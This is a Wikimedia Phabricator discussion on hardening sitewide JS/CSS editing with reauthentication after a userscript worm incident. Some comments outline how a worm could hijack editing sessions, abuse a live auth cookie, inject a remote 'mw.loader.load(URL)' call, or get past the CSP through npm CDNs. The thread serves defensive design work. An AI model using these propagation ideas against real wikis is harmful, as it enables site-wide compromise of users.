Page MenuHomePhabricator

Editing sitewide JS/CSS pages should require elevated security
Open, HighPublic

Description

Global JS editing is as dangerous as you can get; it should require reauthentication like password changes and such. (Although possibly with a significantly longer timeout as editing a page might take long.)

The kind of POST stashing done by FormSpecialPage probably would not work so well (as the edit interface might be JS-based); maybe a mechanism similar to session timeouts could be used instead.

Event Timeline

There are a very large number of changes, so older changes are hidden. Show Older Changes

There is zero reason why these 2FA checks can't happen pre-edit.

From what I see, some additional 2FA check has been implemented. Before editing a js gadget on RuWP, I had to confirm it's me. For the next hour or so, however, I had no 2FA checks before any edits.

image.png (492×583 px, 30 KB)

There is zero reason why these 2FA checks can't happen pre-edit.

From what I see, some additional 2FA check has been implemented. Before editing a js gadget on RuWP, I had to confirm it's me. For the next hour or so, however, I had no 2FA checks before any edits.

image.png (492×583 px, 30 KB)

Does anyone know if these re-auths are being applied to API edits? If not, then I am concerned that we are hardening the wrong thing. The March 2026 userscript incident used API editing, I think.

I think this kind of elevated security for browser editing will only protect against some very uncommon cases (little brother sneaking on to your laptop? Trojan horse remote controlling your mouse?)

There is zero reason why these 2FA checks can't happen pre-edit.

From what I see, some additional 2FA check has been implemented. Before editing a js gadget on RuWP, I had to confirm it's me. For the next hour or so, however, I had no 2FA checks before any edits.

image.png (492×583 px, 30 KB)

Does anyone know if these re-auths are being applied to API edits? If not, then I am concerned that we are hardening the wrong thing. The March 2026 userscript incident used API editing, I think.

I think this kind of elevated security for browser editing will only protect against some very uncommon cases (little brother sneaking on to your laptop? Trojan horse remote controlling your mouse?)

The attacker's script used CSRF-style onwiki editing to propagate, though, and I think that's what is being stopped here.

Is there any ETA on when the proper implementation will happen? It's becoming increasingly annoying that each action=edit requires full re-authentication.

Note that action=edit doesn't actually change anything. I use it to copy the current code. It's now quicker to use private mode and copy code from there, which is a bit absurd given that the "incident" hasn't really revealed any new security risks (or at least none that I haven't known for the last 10 years or so)... So yeah I am annoyed.

I mean bot edits thankfully work e.g. this worked:
https://pl.wikipedia.org/w/index.php?title=MediaWiki:Gadget-refToolbar.js&action=history

Still I had to make a minor change by hand which took annoying long as I was, again, asked twice for the password and token for no apparent reason.
https://pl.wikipedia.org/w/index.php?title=MediaWiki:Gadget-NavFrame.js&diff=prev&oldid=79343077

@Nux for your use case (wanting to copy current code) try ?action=raw

After doing some gadget edits, I can only agree with the comment above by @Nux wholeheartedly. Currently you need to re-login every 15 minutes, you're required to re-login if you're renaming something into MediaWiki namespace without any actual way to do so, and there is no actual logic behind this decision. Frankly, it is unacceptable that WMF has shown such a glaring lapse of judgment and then forced everyone else to suffer as a consequence.

How there is no public deadline for developing a less abrasive solution is beyond me. Two weeks was more than enough to make something to only require 2FA part, at least. You messed up in a massive way, not us.

Except for certain easy fixes, I currently get stuck due to the 15min timeout. It breaks both "Show changes" (diff) and "Publish changes" (save).

While some easy fixes like typos or copy/paste upates are easy to do within a few seconds or minutes, most gadget maintenance takes longer than this. This time period is essentialy the equivalent of a developer doing "git branch" to start work, and then continues (over writing the patch, iterating on it locally, "git add", "git diff", "git commit", test/review, iterate "git commit --amend", test/review) until the equivalent of "git push" or "scap backport".

When you then press "Show changes" after working 15min or more, instead of being permitted (based on a valid edit token), or another reauth, it presents this incorrect and internally contradictory error message:

Screenshot 2026-03-27 at 16.25.50.png (652×1 px, 165 KB)

I do not understand how and why a repeated login should be a remedy against automatic malicious operations?

I can listen to the [publish] button when NAMESPACENUMBER is 8 and CONTENTMODEL is css or javascript.

  • If the button is pressed, I set a cookie yippie with current timestamp. Perhaps waiting for some approval etc., or check success of publishing when this page is rebuilt and got a new revision number.
  • On every visited page from now, if yippie is on time I can run a script with everything I want. I am a confirmed account less than a quarter old. I do not leave traces when bounced back, watched by some smart monitoring.
  • I have interface rights, otherwise I would not get a [publish] button in MediaWiki namespace for CSS or JavaScript.

I know only two ways to protect against compromised scripts:

  1. Approve every single edit by an authentification outside the browser (typing a password manually, 2FA, passkey etc.). No bots any more.
  2. Use a second account for interface only. Revoke interface from all regular accounts. Connect interface groups with safemode for this account. No helpful scripts will be executed. Perhaps a gadget, but no user scripts from anywhere. All site gadgets might be disabled in some safesafemode. If not in safemode for this account or at least for this page editing, do not permit interface editing. Do not permit API editing. Be sure that a faked index.php form is not sent to server, by embedding a random hash. Any helpful things might be added by greasemonkey etc., which is hard to attack by compromised user scripts.

The second approach might be extended to all page editing of resources, at least javascript content model, in user space or whatever by anybody, and perhaps similar operations like moving or changing content model to javascript etc. It would shield against worm proliferation, if javascript editing disables all user scripts and nice site gadgets. It does not help against copying a bulk of random JS into any personal user script, which might be transcluded by other sysops, but those cannot infect further javascript pages any longer.

It is April 1st now, but this is not a joke.

FYI, a report of another instance of problematic use of common.js, although supposedly not one that requires emergency intervention. I haven't personally looked into this, but it's been brought to the Stewards' Noticeboard: https://meta.wikimedia.org/w/index.php?title=Stewards%27_noticeboard&curid=167407&diff=30384271&oldid=30383621. Based on what I read there, requiring re-authentication seems not to address the problem raised in the noticeboard discussion. The noticeboard discussion may be worth thinking about for possible additional actions.

FYI, a report of another instance of problematic use of common.js, although supposedly not one that requires emergency intervention. I haven't personally looked into this, but it's been brought to the Stewards' Noticeboard: https://meta.wikimedia.org/w/index.php?title=Stewards%27_noticeboard&curid=167407&diff=30384271&oldid=30383621. Based on what I read there, requiring re-authentication seems not to address the problem raised in the noticeboard discussion. The noticeboard discussion may be worth thinking about for possible additional actions.

Given that WMF legal apparently evaluated the script and gave their ok, I don't think there's much to discuss (unless the WMF wants to re-evaluate it).

I constantly have to "re-verify" and really, it's annoying AF. Especially as I have to go retrieve a TOTP code every time.

From my understanding, all this change does is add friction when editing a page, which doesn't add actual security.

On a related note, the 2FA is often failing (I tested it a lot, thanks to the issue at hand...). I've worked around the problem by using the "next code" (which always works) instead of the "current code" (which often fails, even when the code is fresh) from my TOTP generator. I've never encountered such an issue elsewhere.

On a related note, the 2FA is often failing (I tested it a lot, thanks to the issue at hand...). I've worked around the problem by using the "next code" (which always works) instead of the "current code" (which often fails, even when the code is fresh) from my TOTP generator. I've never encountered such an issue elsewhere.

FYI: This is a typical symptom of your device’s clock not being in sync with global time (if a website is strict about that). You might want to check if you have automatic clock synchronization enabled.

On Fandom wikis, all sitewide CSS/JS requires approval by Fandom staff before it can be put live. We can do the same here.

User makes edit to sitewide CSS/JS -> user clicks "save" -> user prompted to reauth (either with password or with second factor) -> edit is not immediately live for all users until second and third user with (editinterface) permissions on separate IP address approves the edit and auths with their password and second factor.

image.png (560×521 px, 24 KB)

For user scripts it would be: user makes edit to user CSS/JS -> user clicks "save" -> user prompted to reauth (either with password or with second factor) -> user script is live

Of course, a bypass would be possible through the loading of external scripts or sheets from a place like GitHub. But I highly doubt anyone would be able to load external scripts (except for vetted scripts) into site JS or CSS since the edit would almost certainly be rejected by the second interface admin.

On Fandom wikis, all sitewide CSS/JS requires approval by Fandom staff before it can be put live. We can do the same here.

User makes edit to sitewide CSS/JS -> user clicks "save" -> user prompted to reauth (either with password or with second factor) -> edit is not immediately live for all users until second and third user with (editinterface) permissions on separate IP address approves the edit and auths with their password and second factor.

image.png (560×521 px, 24 KB)

For user scripts it would be: user makes edit to user CSS/JS -> user clicks "save" -> user prompted to reauth (either with password or with second factor) -> user script is live

Of course, a bypass would be possible through the loading of external scripts or sheets from a place like GitHub. But I highly doubt anyone would be able to load external scripts (except for vetted scripts) into site JS or CSS since the edit would almost certainly be rejected by the second interface admin.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so. Do we expect communities to have technical people higher up in the hierarchy?

Argh, we are already struggling with so much friction from the current re-authentication timeouts. Adding a multi-person approval layer on top of that would just add more weight to an already difficult workflow.

Most gadget maintenance takes longer than the current window allows; we should be looking for ways to make this process smoother, not introducing bureaucratic hurdles. Even on the largest wikis, there simply isn't a large enough pool of technical admins to sit around and verify every edit, which would effectively paralyze work.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so. Do we expect communities to have technical people higher up in the hierarchy?

Yep.

  • The person (human being) itself is trusted.
  • However, some JS might be running in the background while editing JS/CSS other than in own userspace.

The challenge is to make sure that no malicious JS is running anywhere, at least not read from any wiki space.

  • Some safemode would be helpful as soon as JS/CSS is edited out of own user space. Or even for every JS/CSS edit.
  • JS from MediaWiki but no wiki page might be trusted.
  • Site JS might be corrupted already, both Gadgets and site resources.
  • Personal user JS is most unsafe.
  • In safemode no helpers nor personal configuration are available. However, via Greasemonkey or browser JS something might be used for equipping the page edit, which could not be attacked by a worm inside wiki pages.
This comment was removed by Ladsgroup.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so. Do we expect communities to have technical people higher up in the hierarchy?

Other interface administrators or WMF staff with the technical expertise to understand which changes potentially introduce security problems.

Adding a multi-person approval layer on top of that would just add more weight to an already difficult workflow.

Being slow should be a feature, not a bug. Especially when one rogue interface admin account can paralyze one of the top 10 most visited websites. There are definitely ways to make the experience a bit more seamless, such as allowing Windows Hello/Face ID/Touch ID/Android Screen Lock/Mobile phone passkeys/YubiKeys/other FIDO2 compliant technologies as a second factor. And ideally, it should be just as easy to "unapprove" an edit to a script as it is to "approve" it.

So who would approve the sitewide adjustments if they are already done by interface moderators, who are qualified to do so. Do we expect communities to have technical people higher up in the hierarchy?

Adding a multi-person approval layer on top of that would just add more weight to an already difficult workflow.

See also: T71445: Implement a proper code-review process for MediaWiki JS/CSS pages on Wikimedia sites

Status quo ante should just be returned given that this 'incident' is frankly the stupidest example of shooting yourself in a foot and then calling the cops on a random passerby. The fact that a month later @sbassett haven't at least personally improved the stop-gap solution, never mind personally apologised for forcing everyone to jump through hoops to edit sitewide JS, is a sign that there is something fundamentally rotten in how entire security team handled this 'incident' of their own making. And no one in the team clearly cares about the impact of their decisions.

The details may not have escaped outside of WMF, but I know that @sbassett has been appropriately contrite. Please focus on the problem rather than the person who has accidentally reminded us how easily the problem can happen.

I do not understand how and why a repeated login should be a remedy against automatic malicious operations? (…)

The repeated login indeed doesn't protect you against yourself (or your own malicious user scripts, browser extensions, Greasemonkey scripts, etc.), for the reasons you explain, but it prevents other interface editors visiting the compromised site from unwittingly contributing to the attack. The reauthentication wouldn't have prevented the initial compromise, but it would have greatly reduced the mess. If we had this requirement in place at the time of the incident, then the first person who noticed the problem could have reverted the malicious site JS edit and ended it. Instead, accounts of other visitors were used to restore the compromised JS, and the site had to be put in read-only mode.

That said, I am also hoping that we implement a less disruptive version of it soon. It looks like we've recently made the code of the current mitigation public (T419621), so I think work is ongoing.

On a related note, the 2FA is often failing (I tested it a lot, thanks to the issue at hand...). I've worked around the problem by using the "next code" (which always works) instead of the "current code" (which often fails, even when the code is fresh) from my TOTP generator. I've never encountered such an issue elsewhere.

FYI: This is a typical symptom of your device’s clock not being in sync with global time (if a website is strict about that). You might want to check if you have automatic clock synchronization enabled.

We have a tolerance of 4 30-second windows before and after the correct time window (https://codesearch.wmcloud.org/deployed/?q=OATHAuthWindowRadius), which (based on 5 minutes of research) is rather permissive.

The least-worst solution I see is to disable execution of JS from wiki pages when editing certain pages within the MediaWiki: namespace, as mentioned in PerfektesChaos's messages above:

when NAMESPACENUMBER is 8 and CONTENTMODEL is css or javascript

  • Some safemode would be helpful as soon as JS/CSS is edited out of own user space. Or even for every JS/CSS edit.
  • JS from MediaWiki but no wiki page might be trusted.

After all, we already do this on Special:Preferences without much complaint; at most, it causes a small surprise. There isn't really any JS so crucial to the editing process.

A related issue I’d like to mention is that when editing one’s own personal JS subpages, the code is executed during the preview! This is very surprising, an open invitation to shoot oneself in the foot, and potentially even a security hole. I cannot recall a single instance where this "feature" was actually useful to me.

The details may not have escaped outside of WMF, but I know that @sbassett has been appropriately contrite. Please focus on the problem rather than the person who has accidentally reminded us how easily the problem can happen.

The details are pretty much public. There is no way any competent interface admin on any wiki would load thousands of scripts from random users, especially users with no edits, to check if they're working after the changes they've made. The fact that after this wild malpractice interface admins are suffering from unnecessary and ill-written restrictions (that are not in any way related to someone running thousands of scripts from their privileged account) is an insult. And the elephant in the room in this whole situation. The security team didn't expose anything that wasn't known by them for years, they just exposed themselves to the silliest exploit.

(This is not the opposition to restrictions overall but rather the haste and the way the current implementation works, as well as clear ignoring of the voices of the competent people affected by this and not at all working in consultation with us.)

Status quo ante should just be returned given that this 'incident' is frankly the stupidest example of shooting yourself in a foot and then calling the cops on a random passerby. The fact that a month later @sbassett haven't at least personally improved the stop-gap solution, never mind personally apologised for forcing everyone to jump through hoops to edit sitewide JS, is a sign that there is something fundamentally rotten in how entire security team handled this 'incident' of their own making. And no one in the team clearly cares about the impact of their decisions.

@stjn, If your current goal is only to call out a single individual and/or grandstand on a specific WMF team, can I suggest you take it somewhere else?

I can understand that you are upset, but forcibly subscribing specific individuals to tasks just to call them and their actions out feels like it oversteps the bounds of civility.

My current goal is to say that the half-baked solution that isn't relevant to the incident but did significantly increase the friction of doing good-faith edits should be removed and the actual solution should be done with care and consideration to the editors and without that friction. If the point was to make people stop doing the edits as much as possible, then I guess it's not a problem.

@stjn: Please read and follow https://www.mediawiki.org/wiki/Bug_management/Phabricator_etiquette if you'd like to remain active in Wikimedia Phabricator. Thanks for your understanding.

The least-worst solution I see is to disable execution of JS from wiki pages when editing certain pages within the MediaWiki: namespace, as mentioned in PerfektesChaos's messages above:

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour and you check that cookie upon editing of Mediawiki:*.js and redirect and done. Probably a one day of work, a bit more for translations.

Status quo ante should just be returned given that this 'incident' is frankly the stupidest example of shooting yourself in a foot and then calling the cops on a random passerby. The fact that a month later @sbassett haven't at least personally improved the stop-gap solution, never mind personally apologised for forcing everyone to jump through hoops to edit sitewide JS, is a sign that there is something fundamentally rotten in how entire security team handled this 'incident' of their own making. And no one in the team clearly cares about the impact of their decisions.

https://en.wikipedia.org/wiki/Security_theater

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

  • Ask for re-auth only when publishing, not when opening the edit page.
  • Since the painful re-auth remains (and happens at a time when failure is more detrimental), we could reduce the cognitive disruption by "announcing" it: style the "Publish changes" button differently (e.g., adding a padlock icon before the button text) and extend the tooltip: « Publish your changes. You may be asked to authenticate again. [alt-s] »
  • An important point: if publishing fails because the user cannot re-auth for any reason (e.g., no immediate access to credentials or a TOTP generator), they should be able to reliably recover their pending content (rather than hitting the browser's "Back" button and crossing their fingers).
  • An ideal workflow would be a modal pop-up for the re-auth so the edit page isn't left at all during the process. However, I’m not sure if the development effort and increased codebase complexity would be worth it for this single use case.

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour and you check that cookie upon editing of Mediawiki:*.js and redirect and done. Probably a one day of work, a bit more for translations.

That approach does not work.

  • I have described in detail that I will wait until there is an interactive person who is able to do vulnerable editing. Now I can set my own cookie. If that edit has been saved, I can exploit my own cookie for the next 14 or 59 minutes and run my worm proliferation every time any further page is viewed, since I know that the security cookie is alive.

The box of pandora has been opened, by edit shutdown for several hours the entire world learnt how to build a worm infecting more and more JS pages at many wikis, starting the nuke attack some days later.

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

There are two ways of attacking:

  • In interactive context, running the worm proliferation if a JS page is edited, or simulation of interactive editing by sending the interactive form fields.
  • In API mode, based upon permission of the requesting account.

Both need to be blocked.

The one and only way to ensure that you really want to edit this, and that no automatic process is involved, is to authorize this edit by something out of the browser page. All cookies are within the page.

  • Furthermore you should be sure that no malicious JS is running which injects some mw.loader.load(URL); with my worm implementation.

Indeed, there are the edits using the JS API, and most of what is discussed here doesn't guard against them, although it's the most straightforward way of worm propagation. Adding safeguard steps to web edits (i.e., the regular form) adds little to no security if we don't guard against the primary attack vector.

I thought of implementing a secret token, dedicated to editing critical pages using the API, which could be found or regenerated in Special:Preferences. As the token would not be publicly exposed, user scripts would no longer be able to edit these pages (unless they implement a prompt for the token). This would still add some inconvenience, but from a security view, it would be very strong.

People running bot apps would just have to add the token to their private codebase (ideally as an "env" item); it's a one-time work and after this they're all set. Note that bot accounts usually don't have the right to edit these pages, so it's limited to the specific case of "interface editor rights + automated edit".

The details are pretty much public. There is no way any competent interface admin on any wiki would load thousands of scripts from random users, especially users with no edits, to check if they're working after the changes they've made.

For something like this to go very wrong would require much more than incompetence on one individual. A couple of years ago LinusTechTips was session-hijacked after an unwitting employee thought he was opening a PDF but was instead opening a token sniffer. People make mistakes, so the system must be forgiving to accommodate those mistakes.

There is an old saying of "trust but verify" which definitely applies to software security as well. If a user is performing a sensitive action always assume that they are unauthorized until they can prove they are authorized. For someone with a privileged right be able to make an edit to site JS/CSS without having any form of secondary approval process is akin to having everyone commit their changes to prod rather than to their own branch on Git.

Indeed, there are the edits using the JS API, and most of what is discussed here doesn't guard against them, although it's the most straightforward way of worm propagation. Adding safeguard steps to web edits (i.e., the regular form) adds little to no security if we don't guard against the primary attack vector.

I think part of the problem is that once you have a threat model of code execution in a browser environment, you have effectively "lost the fight" against the API, per se.

People running bot apps would just have to add the token to their private codebase (ideally as an "env" item); it's a one-time work and after this they're all set. Note that bot accounts usually don't have the right to edit these pages, so it's limited to the specific case of "interface editor rights + automated edit".

Not a bad idea maybe to restrict it behind an OAuth grant of some kind?

My current goal is to say that the half-baked solution that isn't relevant to the incident but did significantly increase the friction of doing good-faith edits should be removed and the actual solution should be done with care and consideration to the editors and without that friction. If the point was to make people stop doing the edits as much as possible, then I guess it's not a problem.

The current solution is staying, but replacing it with something with more care and consideration is a top priority of the PSI team right now.

We published this page last month that describes our priorities over the next few months: https://www.mediawiki.org/wiki/Product_Safety_and_Integrity/Account_Security/Securing_User-Managed_Code

The "roadmap" section there just generally describes April to June, but we will not wait until the end of that period to replace the current approach to return for sitewide JS editing. We haven't landed on an exact date, but it is likely to be in May (though you will see coding work happening in April on it). We'll have a more precise date as we get further ahead on the work.

The discussion on the best way to achieve it here is quite welcome - now is the time to influence our thinking on it. Our goal is implement a streamlined UX (especially for users with passkeys), that is specific to the permissions being requested and not modifiable by user scripts, and that is dynamic enough about when it triggers that it doesn't get in the way of users who are exercising their permissions repeatedly over a sustained period of time.

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

  • Ask for re-auth only when publishing, not when opening the edit page.

This is a good idea, and probably the best solution to T423193. This would be a bit complicated because we have to preserve/stash the submitted edit while going through the reauth process, but we will have to do that regardless (to handle the case where your reauth times out after you click edit but before you click submit), and we're already planning to do it soon. I think we should be able to do this in the next month or two.

  • Since the painful re-auth remains (and happens at a time when failure is more detrimental), we could reduce the cognitive disruption by "announcing" it: style the "Publish changes" button differently (e.g., adding a padlock icon before the button text) and extend the tooltip: « Publish your changes. You may be asked to authenticate again. [alt-s] »

This is a great suggestion too, we will aim to do this as part of T197136.

  • An important point: if publishing fails because the user cannot re-auth for any reason (e.g., no immediate access to credentials or a TOTP generator), they should be able to reliably recover their pending content (rather than hitting the browser's "Back" button and crossing their fingers).

Yes, this is really important. We have to preserve the pending content regardless (because it has to persist through the reauth steps before it gets submitted), but if the reauth fails / is aborted, we should send the user back to the edit form with their pending content still in it.

What would be even better is if we could have the reauth happen in a popup. There is code to enable (re-)logins in a popup that was written a few years ago but never used for anything, this would be a great use case for that.

  • An ideal workflow would be a modal pop-up for the re-auth so the edit page isn't left at all during the process. However, I’m not sure if the development effort and increased codebase complexity would be worth it for this single use case.

... I swear I didn't read this before I wrote my comment above, it was hidden and I just scrolled down to reveal it. Yes, exactly this, and thankfully the development effort already happened a few years ago, so we should be able to just grab the login popup system off the shelf and use it.

Also, if the intent is to safeguard users from malicious JS execution, then it should be possible to enable safe mode for yourself and then not have to deal with the annoying and ill-written restrictions that exist right now. I would much rather toggle that setting and do my edits in peace than have to re-login every 15 minutes for no reason (I don’t think any website is as draconian in their restrictions of this kind, even Github's sudo mode for changing restricted settings is much more permissive).

How about only asking for the password? That should be sufficient, right? Not even filling in the username and password — no, just the password.
In other words, switching from “re‑authenticate to confirm” to “type your password to confirm” (compatible with browser autofill, of course).

Password entry is very convenient thanks to the browser remembering it, whereas 2FA is annoying AF, even with a local TOTP generator right in the next browser tab — which is probably one of the most convenient setups possible.

I can tolerate 2FA, but only barely… mainly because the TOTP code is only required at login. But every 15 minutes, especially when one is in the flow of editing files? Hell no.

Indeed, there are the edits using the JS API, and most of what is discussed here doesn't guard against them

For what it's worth, the current temporary solution applies to API edits in the browser too (see T419621#11827741), and presumably the new one will as well.

I thought of implementing a secret token, dedicated to editing critical pages using the API, which could be found or regenerated in Special:Preferences. As the token would not be publicly exposed, user scripts would no longer be able to edit these pages (unless they implement a prompt for the token). This would still add some inconvenience, but from a security view, it would be very strong.

People running bot apps would just have to add the token to their private codebase (ideally as an "env" item); it's a one-time work and after this they're all set. Note that bot accounts usually don't have the right to edit these pages, so it's limited to the specific case of "interface editor rights + automated edit".

You're basically describing an OAuth consumer or a bot password, which you can use today :) (and which allow edits to site JS, if you grant the necessary rights while creating them).

Why is this even necessary?

See my reply to @PerfektesChaos in comment T197137#11821539.

Also, if the intent is to safeguard users from malicious JS execution, then it should be possible to enable safe mode for yourself and then not have to deal with the annoying and ill-written restrictions that exist right now. I would much rather toggle that setting and do my edits in peace than have to re-login every 15 minutes for no reason (I don’t think any website is as draconian in their restrictions of this kind, even Github's sudo mode for changing restricted settings is much more permissive).

On the one hand, I like this suggestion, and I'm a fan of enabling safe mode for yourself in preferences if you have too many scary rights (you can do this today, and in global preferences too; I use it myself).

On the other hand, you can't test the site JS changes you're making while in safe mode, so this seems a bit impractical. I think it'd be reasonable to do this, but a well-implemented reauth requirement (less annoying than what we have now) would probably be better.

How about only asking for the password? That should be sufficient, right? Not even filling in the username and password — no, just the password.
In other words, switching from “re‑authenticate to confirm” to “type your password to confirm” (compatible with browser autofill, of course).

Password entry is very convenient thanks to the browser remembering it, whereas 2FA is annoying AF, even with a local TOTP generator right in the next browser tab — which is probably one of the most convenient setups possible.

I can tolerate 2FA, but only barely… mainly because the TOTP code is only required at login. But every 15 minutes, especially when one is in the flow of editing files? Hell no.

TOTP is by far the least convenient 2FA setup we support :) The only good thing about it is that it's low-tech, since you can generate TOTP codes on any device you already have.

For convenience, a security key like Yubikey is much nicer (you only need to touch the dongle plugged into your computer), or a passkey, which can also be remembered by the browser.

It would also be much easier and marginally more secure if instead of MediaWiki simply executing common.js/[skin].js, instead user scripts were loaded via an ImportJS text file or something similar. Fandom has this as an option for its sites.

Benefits are that we can disable external loading of off-site scripts in the common.js file, we can also disallow loading of scripts in any namespace other than MediaWiki:, we can also more rigorously enforce code review for any site-wide script before it will be loaded by ImportJS. ImportJS would still require interface admin rights. We can also record a script's usage if users also had to use ImportJS instead of common.js files. No one can then compromise an entire wiki by pasting their malicious script onto common.js.

Downside is that it would require a ton of more JS pages be created in MediaWiki namespace.

Perhaps it's worth a ponder for gadgets.

disable external loading of off-site scripts in the common.js file

Small note: since the incident we've turned on CSP, so all external scripts not on an allowlist are now blocked.

Can you link to an example ImportJS text file, and maybe include a code snippet of loading the file, so I can visualize how this works?

How about only asking for the password? That should be sufficient, right? Not even filling in the username and password — no, just the password.

That's exactly T197153.

I still prefer the "disable execution of JS from wiki pages" approach (though would it be sufficient?), but if "re-auth" is kept, we could reduce its friction:

  • Ask for re-auth only when publishing, not when opening the edit page.

This is a good idea, and probably the best solution to T423193. This would be a bit complicated because we have to preserve/stash the submitted edit while going through the reauth process, but we will have to do that regardless (to handle the case where your reauth times out after you click edit but before you click submit), and we're already planning to do it soon. I think we should be able to do this in the next month or two.

Yeah. Current approach is not working at all.

  1. I get asked for auth when getting the code.
  2. I work on fixing the code
  3. I have no option to freking re-auth and save the page...

And yes, the message is just wrong.

obraz.png (997×1 px, 147 KB)

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour and you check that cookie upon editing of Mediawiki:*.js and redirect and done. Probably a one day of work, a bit more for translations.

That approach does not work.

  • I have described in detail that I will wait until there is an interactive person who is able to do vulnerable editing. Now I can set my own cookie. If that edit has been saved, I can exploit my own cookie for the next 14 or 59 minutes and run my worm proliferation every time any further page is viewed, since I know that the security cookie is alive.

The box of pandora has been opened, by edit shutdown for several hours the entire world learnt how to build a worm infecting more and more JS pages at many wikis, starting the nuke attack some days later.

All auth is just cookies and session. All that is needed is to estabilish that the session is in some "can-edit-important-stuff" mode. For that you only need:

  1. A place where user scripts are not running. E.g. a special page (like prefs).
  2. Human interaction.
  3. Adding a cookie that cannot be altered by JS (and/or some session param). https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Cookies#block_access_to_your_cookies

disable external loading of off-site scripts in the common.js file

Small note: since the incident we've turned on CSP, so all external scripts not on an allowlist are now blocked.

Can you link to an example ImportJS text file, and maybe include a code snippet of loading the file, so I can visualize how this works?

Which still allows anyone to push any code to npm and use npm-cdn that is allowed in the CSP. So the CSP is mostly useless. It blocks legitimate requests, breaks tools and doesn't block any real attacks that can still happen.

TOTP is by far the least convenient 2FA setup we support :) The only good thing about it is that it's low-tech, since you can generate TOTP codes on any device you already have.

For convenience, a security key like Yubikey is much nicer (you only need to touch the dongle plugged into your computer), or a passkey, which can also be remembered by the browser.

Aside — I personally disagree with this:

  • I strongly dislike using smartphones, and getting my fat a** out of the chair to go get the phone and unlock it is annoying AF to me.
  • My computer is about two meters away; again, getting up to touch a YubiKey would be very annoying, and using a USB extension cable would add ridiculous clutter.
  • I dislike fingerprint sensors, which often fail to work. Same with face detection, etc. I prefer clear, reliable actions like pressing physical keys — not swiping, touching, or hoping a sensor recognizes me.
  • Typing a PIN would be about as tedious as copy‑pasting a TOTP code.

Manual TOTP copy‑paste is genuinely the best workflow for me. I do it very fast, and it adds the least amount of friction I can achieve.

But even the least amount of friction can sometimes be too much… like having to do it every 15 minutes (the repetition gets tiresome), or when you’re in deep work and an interruption breaks your focus.

(And despite how this sounds, don’t worry — I do get my exercise, but at different times.)

Or you can just click a button "yes I want to edit sitewide JS" on Special:QuickAuth. This adds a cookie token for an hour and you check that cookie upon editing of Mediawiki:*.js and redirect and done. Probably a one day of work, a bit more for translations.

That approach does not work.

  • I have described in detail that I will wait until there is an interactive person who is able to do vulnerable editing. Now I can set my own cookie. If that edit has been saved, I can exploit my own cookie for the next 14 or 59 minutes and run my worm proliferation every time any further page is viewed, since I know that the security cookie is alive.

The box of pandora has been opened, by edit shutdown for several hours the entire world learnt how to build a worm infecting more and more JS pages at many wikis, starting the nuke attack some days later.

All auth is just cookies and session. All that is needed is to estabilish that the session is in some "can-edit-important-stuff" mode. For that you only need:

  1. A place where user scripts are not running. E.g. a special page (like prefs).
  2. Human interaction.
  3. Adding a cookie that cannot be altered by JS (and/or some session param). https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/Cookies#block_access_to_your_cookies

Having thought about this more, I agree that the current solution both adds more friction (most people saying that here) and does NOT add much to security at the same time.

I mean, you can make a popup like T423193 suggests. But in a popup you still say "unlock API for a while". So you unlock the API and then a dormant worm might attack (as @PerfektesChaos suggested). The window is smaller, but it’s still there. You could go further and in a popup say "unlock editing for Mediawiki:Gadget-something.js for the next 5 minutes". That still doesn't say which content is added. A worm could hijack submit and replace the JS script contents. The risks are smaller but they are still there. And also the popup would have be in a sandbox which complicates it (you would have to use window.parent.postMessage to communicate action from the iframe to parent).

So... I now agree with @Od1n that a better approach would be to edit pages without user JS. This can be done as follows:

  1. Create something like /wiki/Special:SecureEdit?title=Mediawiki:Gadget-something.js for editing fragile pages. The page is just like a normal edit page but does not load most scripts.
  2. Redirect all edits of fragile pages to Special:SecureEdit.
  3. Forbid the submit action on the fragile pages.
  4. Forbid API actions on the fragile pages (still allow for botpassword session).

This works well because:

  1. You cannot inject anything into that special page as long as you cannot create service workers on the main path (and currently you cannot do that).
  2. The special page doesn't load web-editable scripts.
  3. The special session will not end (and so T423193 becomes irrelevant).
  4. You can just define what is a "fragile page" in a separate place and makes things easy to configure and change in the future.

No one can then compromise an entire wiki by pasting their malicious script onto common.js.

No - a malicious script can be self contained (e.g. in JS converting a function to string results in its source code). Also, even if we disable loading external script, malicious script can simply fetch external (or even in Wikimedia) webpage and eval it.

Which still allows anyone to push any code to npm and use npm-cdn that is allowed in the CSP. So the CSP is mostly useless. It blocks legitimate requests, breaks tools and doesn't block any real attacks that can still happen.

To be clear, including npm CDNs in our CSP was a (significant) concession to avoid breakage, and not something we expect to support long-term. It will need to come off of the CSP allowlist eventually. Even so, npmjs and raw.githubusercontent.com are both owned by Microsoft, and have their own internal security teams that have now endured extensive experience with public security incidents caused by malicious code, and are investing in making this harder to happen and for shorter amounts of time. That is dramatically different than the open-season internet with domains an attacker can fully control until their DNS is disabled (if that is even feasible). Even this interim situation that includes user-manageable CDN endpoints is much safer than it was before the CSP went up.

Which still allows anyone to push any code to npm and use npm-cdn that is allowed in the CSP. So the CSP is mostly useless. It blocks legitimate requests, breaks tools and doesn't block any real attacks that can still happen.

To be clear, including npm CDNs in our CSP was a (significant) concession to avoid breakage, and not something we expect to support long-term. It will need to come off of the CSP allowlist eventually. Even so, npmjs and raw.githubusercontent.com are both owned by Microsoft, and have their own internal security teams that have now endured extensive experience with public security incidents caused by malicious code, and are investing in making this harder to happen and for shorter amounts of time. That is dramatically different than the open-season internet with domains an attacker can fully control until their DNS is disabled (if that is even feasible). Even this interim situation that includes user-manageable CDN endpoints is much safer than it was before the CSP went up.

If I'm reading that correctly, this is not how any of this works, EMill. Microsoft is NOT securing the scripts on GitHub. In fact it's perfectly legal to write proof-of-concept tools for attacking websites like e.g. excessy (tool for XSS). I would like to see anyone try to take down that tool (written by Google's security expert).

